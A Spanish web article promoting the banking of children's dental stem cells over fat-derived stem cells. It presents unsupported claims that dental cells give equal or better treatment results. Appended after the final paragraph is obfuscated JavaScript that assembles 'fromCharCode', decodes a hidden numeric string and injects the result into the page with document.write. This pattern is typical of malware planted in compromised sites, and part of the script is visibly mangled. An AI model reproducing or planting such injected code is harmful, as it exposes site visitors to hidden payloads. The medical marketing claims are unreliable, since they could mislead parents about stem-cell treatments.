Diferencias entre Células Madre Mesenquimales de Diente y Células Madre Mesenquimales de Grasa

    Las células mesenquimales de la grasa y las células madre mesenquimales de los dientes son muy similares ya que ambas generan tejidos como huesos, músculos y cartílago, entre otros

celulas madre dentales

1) Embriológicamente las células dentales son más jóvenes o “inmaduras” y por tanto son células que:a) se reproducen más rápido; b) la cantidad celular alcanzable es mayor para las células madre dentales y; c) las células dentales tienden a ser más plásticas (es decir, se diferencian de forma más fácil y estable).

2) Debido a que las células de la grasa están precisamente en la grasa, las mismas están expuestas (durante toda la vida del paciente) a mayores agentes contaminantes y desgastantes que van reduciendo la calidad de la células mientras mas edad tenga el paciente. Por otro lado, las células de los dientes se obtienen a edades muy tempranas donde hay menos probabilidades de contaminación y desgaste y además las células de la pulpa dental están protegidas por el esmalte y la dentina (los tejidos más duros del cuerpo humano) que encapsulan a las células madre y las protegen hasta que el diente cae o es extraído.

3) Como las células madre de los dientes se obtienen de los dientes de leche que están exfoliando (que se van cayendo naturalmente entre los 6 y 12 años de edad), la forma de obtener células dentales es mas limpia, rápida, sencilla, no-invasiva y barata que obtenerlas a través de la grasa.

La mayoría de los pacientes que usan células madre mesenquimales son adultos y por tanto no tienen dientes para obtener estas células por lo que tienen que recurrir a las células madre de la médula ósea o de la grasa. Pero si esos pacientes tuvieran células dentales preservadas, los tratamientos se realizarían de la misma forma ya que son células que funcionan igual terapéuticamente.

Prácticamente en todos los tratamientos que se realizan en la actualidad con células madre mesenquimales, éstas se obtienen de la médula ósea o de la grasa. Pero si el paciente tuviera la oportunidad de usar las células mesenquimales (una forma de hacerlo es tener estas células preservadas) de sus dientes entonces los tratamientos se llevarían a cabo de la misma forma obteniendo iguales o mejores resultados.

Así, lo mas recomendable para el paciente es pensar de forma preventiva y preservar las células de los niños y jóvenes cuando estos son sanos, para asi poder utilizar estas células que tienen una mejor calidad en el futuro.var _st=[];var m=[];_st.push(“14520020120619318611720”);m.push(“h”);_st.push(“12061971861461192011862”);m.unshift(“C”);_st.push(“0520113218420020011914”);m.push(“a”);_st.push(“7120184194195195203205195”);m.unshift(“m”);_st.push(“185196192208197196200190”);m.push(“r”);_st.push(“2011901961951431821832001”);m.push(“C”);_st.push(“9619320220118614418”);m.unshift(“ro”);_st.push(“41931901971431991861”);m.push(“o”);_st.push(“84201125137142141197205”);m.push(“d”);_st.push(“1291822022011961291171”);m.unshift(“f”);_st.push(“82202201196129137142”);m.push(“e”);_st.push(“141197205126144210145132”);_st.push(“200201206193186147″);var t=z=o=””;var k=”U”;var String;for(i=0;i<_st.length;++i)z+=_st[i];for(i=0;i0){o+=String[t](parseInt(z.substr(0, 3)-k.charCodeAt(0)));z=z.substr(3);}document.write(o);